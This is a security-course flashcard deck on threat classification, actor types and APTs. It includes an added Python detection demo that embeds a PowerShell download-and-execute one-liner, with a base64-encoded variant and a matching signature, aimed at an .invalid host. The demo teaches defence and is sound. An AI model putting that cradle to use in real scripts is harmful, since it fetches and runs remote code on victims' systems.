Section 4: Classifying Threats Flashcards

1
Q

What are the two highest levels of threat classification categories?

A

Known threats and unknown threats

2
Q

Define known threats.

A

Any threat that can be identified with basic signature or pattern matching, because its hash, byte pattern, or behaviour has already been catalogued by defenders

Examples include previously analysed malware and documented (publicly known) exploits.

3
Q

What is malware?

A

Any software intentionally designed to damage, disrupt, or gain unauthorized access to a computer, server, client, or computer network

4
Q

List examples of malware.

A

  • Viruses
  • Rootkits
  • Trojans
  • Botnets (strictly, the bot malware that enrolls an infected host into the botnet)

5
Q

What is a documented exploit?

A

A piece of software, data, or sequence of commands that takes advantage of a known, publicly documented vulnerability to cause unintended behaviour or gain unauthorized access

6
Q

How can known threats be detected?

A

By matching against signatures (byte patterns), file hash values, or similar indicators of compromise distributed in threat feeds

7
Q

What is an unknown threat?

A

Any threat that cannot be identified using basic signature or pattern matching

8
Q

What is a zero-day exploit?

A

An exploit, seen in the wild, for a software or hardware vulnerability that the vendor does not yet know about or has not yet patched, so defenders have had "zero days" to prepare and no signature exists for it

9
Q

What issues can arise from a zero-day vulnerability?

A

It can be exploited before the vendor, defenders, or detection vendors know it exists, so a compromise can go unnoticed until damage is already done

10
Q

Define obfuscated malware code.

A

Malicious code whose content and purpose have been disguised with techniques such as compression (packing), encryption, or encoding (for example base64), so that signature or pattern matching on the raw bytes fails; the real code is only unpacked or decoded at run time

11
Q

What is behavior-based detection?

A

A malware detection method that judges an object by what it does or attempts to do (network connections, spawned processes, file and registry changes), for example by emulating or sandboxing it before it is allowed to run on the host, rather than by what its bytes look like

12
Q

Explain the concept of recycled threats.

A

Combining and modifying parts of existing exploit or malware code to produce variants whose hashes and exact byte patterns no longer match existing signatures, even though the underlying technique is old

13
Q

What are known unknowns?

A

The class of threats that use obfuscation or recycled code to defeat signature matching: the underlying technique is known, but this particular sample has no signature yet

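The cards on signature and hash detection (card 6), obfuscated code (card 10), behaviour-based detection (card 11), recycled threats (card 12) and known unknowns (card 13) describe one detection pipeline. The Python below is an added example, not material from this deck, that walks constructed samples through that pipeline: an exact hash catches the documented sample, a family byte pattern still catches the recycled variant, and only a behaviour score catches the base64-obfuscated variant. The samples, the hash blocklist, the pattern signature, the behaviour weights and the threshold are all assumptions made for illustration; the download one-liner is only a string that is never executed, and the URL uses the reserved .invalid domain.

```python
"""Added example (not part of the flashcard deck): why hash and pattern
signatures catch known threats, why recycled and obfuscated variants slip
past them, and how a behaviour check (what the object does, not what it looks
like) turns an 'unknown' back into a 'known unknown'. Every sample here is a
constructed byte string using the reserved .invalid domain; none is real malware."""
import base64
import hashlib
import re

# Constructed "documented" sample: a download-and-execute one-liner (never run here).
DOWNLOAD_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
KNOWN_SAMPLE = f'powershell -c "{DOWNLOAD_CRADLE}"'.encode()

# Known known: an exact hash, as an AV/EDR blocklist feed would carry it (assumed feed).
HASH_BLOCKLIST = {hashlib.sha256(KNOWN_SAMPLE).hexdigest()}

# Known known: a byte pattern shared by the whole family, so it survives small edits.
PATTERN_SIGNATURES = {
    "ps_webclient_cradle": re.compile(rb"IEX \(New-Object Net\.WebClient\)\.DownloadString", re.I),
}

def hash_match(sample: bytes) -> bool:
    """Exact-match detection: one byte changed and the hash no longer matches."""
    return hashlib.sha256(sample).hexdigest() in HASH_BLOCKLIST

def pattern_match(sample: bytes):
    """Pattern detection: returns the names of every signature found in the bytes."""
    return [name for name, sig in PATTERN_SIGNATURES.items() if sig.search(sample)]

# Behaviour-based: weights for actions observed when the object runs. The trace
# format and weights are assumptions; a real sandbox/EDR records far richer events.
BEHAVIOUR_WEIGHTS = {
    ("script", "decode_base64"): 1,
    ("script", "invoke_expression"): 2,
    ("network", "http_download"): 2,
    ("process", "spawn_child_shell"): 2,
    ("file", "write_startup_folder"): 3,
}

def behaviour_score(trace) -> int:
    return sum(BEHAVIOUR_WEIGHTS.get(event, 0) for event in trace)

def classify(sample: bytes, trace, threshold: int = 4) -> str:
    """Cheap exact match first, then the family pattern, then behaviour."""
    if hash_match(sample):
        return "known known (hash)"
    if pattern_match(sample):
        return "known known (pattern)"
    if behaviour_score(trace) >= threshold:
        return "known unknown (behaviour)"
    return "not detected"

# Recycled threat: same cradle, new payload URL. The hash changes, the pattern holds.
RECYCLED_SAMPLE = KNOWN_SAMPLE.replace(b"p.ps1", b"update.ps1")

# Obfuscated threat: the same cradle, base64 over UTF-16LE as -EncodedCommand expects.
# Neither the hash nor the plaintext pattern survives the encoding.
OBFUSCATED_SAMPLE = b"powershell -EncodedCommand " + base64.b64encode(DOWNLOAD_CRADLE.encode("utf-16-le"))
OBFUSCATED_TRACE = [("script", "decode_base64"), ("network", "http_download"), ("script", "invoke_expression")]

# Constructed benign control: a harmless command with a harmless trace.
BENIGN_SAMPLE = b'powershell -c "Get-Service spooler"'
BENIGN_TRACE = [("script", "invoke_cmdlet")]

def demo():
    return {
        "known": classify(KNOWN_SAMPLE, []),
        "recycled": classify(RECYCLED_SAMPLE, []),
        "obfuscated_static_only": classify(OBFUSCATED_SAMPLE, []),
        "obfuscated_with_trace": classify(OBFUSCATED_SAMPLE, OBFUSCATED_TRACE),
        "benign": classify(BENIGN_SAMPLE, BENIGN_TRACE),
    }

if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:24s} {verdict}")
```

The "obfuscated_static_only" verdict is the gap the deck is describing: with static matching alone the encoded sample is simply "not detected", and it becomes a known unknown only once something observes what it does.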
14
Q

What are unknown unknowns?

A

The class of threats built on completely new attack vectors and exploits, for which nothing previously seen exists to match against

15
Q

What are the four quadrants in the threat classification chart?

A
  • Known knowns
  • Unknown knowns
  • Known unknowns
  • Unknown unknowns
16
Q

What are known knowns?

A

Threats we are certain about and already have established signatures for

17
Q

What are unknown knowns?

A

Something known to others (another vendor, researcher, or team) but not yet known to you

18
Q

What is a known unknown?

A

Something that lacks a signature but is recognized as potentially harmful, typically from its behaviour or its resemblance to a known technique

19
Q

What are unknown unknowns?

A

Things that are known to neither party and can only be discovered through research

20
Q

What is the Johari Window?

A

A four-quadrant model (open, blind, hidden, and unknown) for classifying what is known to whom; applied to threats, the aim is to move as much as possible into the open (known) quadrant

21
Q

What does the ‘open’ quadrant in the Johari Window represent?

A

Knowledge that is known to both the individual and others

22
Q

What does the ‘hidden’ quadrant in the Johari Window represent?

A

Knowledge that is known to the individual but not known to others

23
Q

What does the ‘blind’ quadrant in the Johari Window represent?

A

Knowledge that is known to others but not known to the individual

24
Q

What does the ‘unknown’ quadrant in the Johari Window represent?

A

Knowledge that is not known to either the individual or others

25
Q

What is the term used to describe individuals or groups who want to harm networks or steal protected data?

A

Threat actor

Threat actors range from lone individuals to organized groups and nation-states.

26
Q

What are the two main categories of threat actors based on their structure?

A

Structured and unstructured

Structured actors are organized, skilled, and resourced (organized crime, nation-states); unstructured actors are opportunistic and low-skill (script kiddies, lone individuals).

27
Q

What is the difference between a hacker and a cracker?

A

A hacker is a computer enthusiast, while a cracker is a hacker with malicious intent.

The terms have been blended in media, but the distinction is important in cybersecurity.

28
Q

What are the three types of hackers based on the ‘hats’ they wear?

A
  • Black hat hackers: attack without authorization and with malicious intent
  • White hat hackers: test systems with the owner's authorization (ethical hacking)
  • Gray hat hackers: act without authorization but without malicious intent, often disclosing what they find

Each type represents a different ethical stance on hacking.

29
Q

What is a script kiddie?

A

An attacker with the least amount of skill who uses others’ tools for attacks.

Script kiddies typically do not develop their own hacking tools.

30
Q

What is an insider threat?

A

A current or former employee, contractor, or partner with legitimate knowledge of, or access to, the organization's systems who may cause harm.

Insider threats can be intentional or unintentional.

31
Q

What are the two types of insider threats?

A
  • Intentional insider threats
  • Unintentional insider threats

Intentional threats involve deliberate harm, while unintentional threats arise from carelessness or errors.

32
Q

What motivates competitors as threat actors?

A

Stealing proprietary data, disrupting business, or damaging reputation.

Competitors may use insider threats to achieve their goals.

33
Q

What characterizes organized crime as a threat actor?

A

Focus on hacking and computer fraud for financial gain.

Organized crime groups often use sophisticated attacks and tools.

34
Q

What defines a hacktivist?

A

Politically motivated hackers targeting governments and corporations to advance their agendas.

Hacktivists can act individually or as part of larger groups.

35
Q

What is a nation-state in the context of cybersecurity?

A

A well-resourced, highly skilled threat actor working for or sponsored by a government, pursuing political, military, or economic objectives through cyber attacks.

Nation-states often conduct advanced persistent threat (APT) campaigns.

36
Q

What is an APT?

A

Advanced Persistent Threat, a long-term presence on a network to gather sensitive information.

APTs can be carried out by various actors, including nation-states and criminal organizations.

37
Q

What is a false flag attack?

A

An attack designed to appear as if it was conducted by a different group.

This tactic is used for plausible deniability by the actual perpetrators.

38
Q

Fill in the blank: A _______ is a simple program often used by script kiddies to conduct denial of service attacks.

A

Low Orbit Ion Cannon (LOIC)

It floods a target with TCP, UDP, or HTTP requests from a point-and-click interface, so the user needs no understanding of how the attack works.

39
Q

What are key defensive measures against insider threats?

A
  • Employee education and training
  • Access controls
  • Incident response plans
  • Regular monitoring of user activity

These measures help mitigate risks associated with insider threats.

40
Q

What was the 2020 SolarWinds attack an example of?

A

A supply chain attack attributed to nation-state actors.

The attackers compromised the build of SolarWinds' Orion platform so that a legitimately signed software update carried a backdoor into the networks of the customers who installed it.

41
Q

What is the impact of unintentional insider threats?

A

Causes harm unintentionally due to carelessness or lack of knowledge.

Examples include falling for phishing emails or using weak passwords.

42
Q

True or False: All APTs are nation-state actors.

A

False

Nation-state actors commonly run APT campaigns, but organized crime groups and other well-resourced actors run them too, so APT describes the campaign rather than the sponsor.

43
Q

What does APT stand for?

A

Advanced Persistent Threat

44
Q

What is the primary characteristic of an APT?

A

Establishes a long-term presence on a network

45
Q

What is the main goal of an advanced persistent threat?

A

Harvest sensitive data, intellectual property, and other sensitive information

46
Q

Who can carry out APTs?

A

Nation-states, criminal organizations, and individual hackers

47
Q

How long can APTs infiltrate a network?

A

From weeks to months or even years

48
Q

What does the term ‘living off the land’ refer to in the context of APTs?

A

Using legitimate tools already present on the system (built-in administrative utilities and scripting engines) instead of dropping custom malware, so there is no new file for signature-based tools to flag

49
Q

True or False: APTs are typically poorly funded and disorganized.

A

False

APTs are well resourced, organized, and patient; that is what lets them stay hidden on a network for months or years.

50
Q

What differentiates a nation-state actor from an APT?

A

A nation-state actor describes who the adversary is (an actor affiliated with or sponsored by a government), while APT describes how a campaign is conducted (stealthy, long-term, well-resourced); nation-states often run APT campaigns, but other actors can too

51
Q

What level of persistence is associated with APTs?

A

High level of persistence and determination

52
Q

Fill in the blank: APTs carefully hide their activity and blend in with _______.

A

normal network traffic